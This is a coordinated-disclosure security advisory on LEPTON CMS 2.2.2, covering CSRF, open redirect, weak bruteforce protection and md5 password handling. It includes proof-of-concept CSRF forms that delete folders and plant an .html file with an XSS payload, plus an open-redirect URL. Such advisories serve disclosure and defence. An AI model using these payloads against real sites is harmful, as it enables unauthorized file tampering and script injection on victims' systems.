Lepton 2.2.2 Stable CSRF / Open Redirect / Password Handling

`Security Advisory - Curesec Research Team  
  
1. Introduction  
  
Affected Product: LEPTON 2.2.2 stable  
Fixed in: 2.3.0  
Fixed Version http://www.lepton-cms.org/posts/  
Link: important-lepton-2.3.0-101.php  
Vendor Website: http://www.lepton-cms.org/  
Vulnerability CSRF, Open Redirect, Insecure Bruteforce Protection &  
Type: Password Handling  
Remote Yes  
Exploitable:  
Reported to 09/05/2016  
vendor:  
Disclosed to 11/10/2016  
public:  
Release mode: Coordinated Release  
CVE: n/a  
Credits Tim Coen of Curesec GmbH  
  
2. Overview  
  
Lepton is a content management system written in PHP. In version 2.2.2, it  
contains various low to medium impact issues. The functionality that operates  
on files and folders is vulnerable to CSRF which may lead to XSS, the logout is  
vulnerable to Open Redirect, the in-build bruteforce protection can be easily  
bypassed, and passwords are hashed with md5 and send out via email in  
plaintext.  
  
3. Details  
  
CSRF  
  
CVSS: Medium 4.0 AV:N/AC:H/Au:N/C:N/I:P/A:P  
  
Description: All actions on folders and files are missing CSRF protection.  
Because of this, an attacker can delete, create, or rename folders and files.  
An attacker could for example create .html files which would lead to an XSS  
attack.  
  
Proof of Concept:  
  
Delete Folder: <html> <body> <form action="http://localhost//  
LEPTON_stable_2.2.2/upload/modules/tiny_mce_4/tiny_mce/filemanager/execute.php?  
action=delete_folder" method="POST"> <input type="hidden" name="path" value=  
"test>" /> <input type="hidden" name="name" value="" /> <input type="submit"  
value="Submit request" /> </form> </body> </html> Create File: <html> <body>  
<form action="http://localhost//LEPTON_stable_2.2.2/upload/modules/tiny_mce_4/  
tiny_mce/filemanager/execute.php?action=create_file" method="POST"> <input type  
="hidden" name="path" value="" /> <input type="hidden" name="name" value=  
"test.html" /> <input type="hidden" name="new_content" value="<img src=no  
onerror=alert(1)>" /> <input type="submit" value="Submit request" /> </form> </  
body> </html>  
  
Open Redirect  
  
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:NP  
  
Description: The redirect parameter of the logout script is vulnerable to open  
redirect.  
  
Proof of Concept:  
  
http://localhost/LEPTON_stable_2.2.2/upload/account/logout.php?redirect=http://  
google.com  
  
Insufficient Bruteforce Protection  
  
Description: The bruteforce protection works on a per-session base, which is  
easily bypassed by an attacker by simply requesting a new session by not  
sending the current, locked session information. The current bruteforce  
protection may provide a false sense of security and should thus be removed or  
changed.  
  
Code:  
  
if($_SESSION['ATTEMPS'] > $this->max_attemps) { $this->warn(); }  
  
Password Handling  
  
The password reset functionality sends a newly generated password in plaintext  
via email, which is not recommended.  
  
Additionally, md5 is used for hashing, which is also not recommended.  
  
4. Solution  
  
To mitigate this issue please upgrade at least to version 2.3.0:  
  
http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php  
  
Please note that a newer version might already be available.  
  
5. Report Timeline  
  
09/05/2016 Informed Vendor about Issue  
09/06/2016 Vendor requests 60 days to release fix  
10/25/2016 Vendor releases fix  
11/10/2016 Disclosed to public  
  
  
Blog Reference:  
https://www.curesec.com/blog/article/blog/Lepton-222-CSRF-Open-Redirect-Insecure-Bruteforce-Protection-amp-Password-Handling-172.html  
  
--  
blog: https://www.curesec.com/blog  
tweet: https://twitter.com/curesec  
  
Curesec GmbH  
Curesec Research Team  
Josef-Orlopp-StraAe 54  
10365 Berlin, Germany  
  
  
`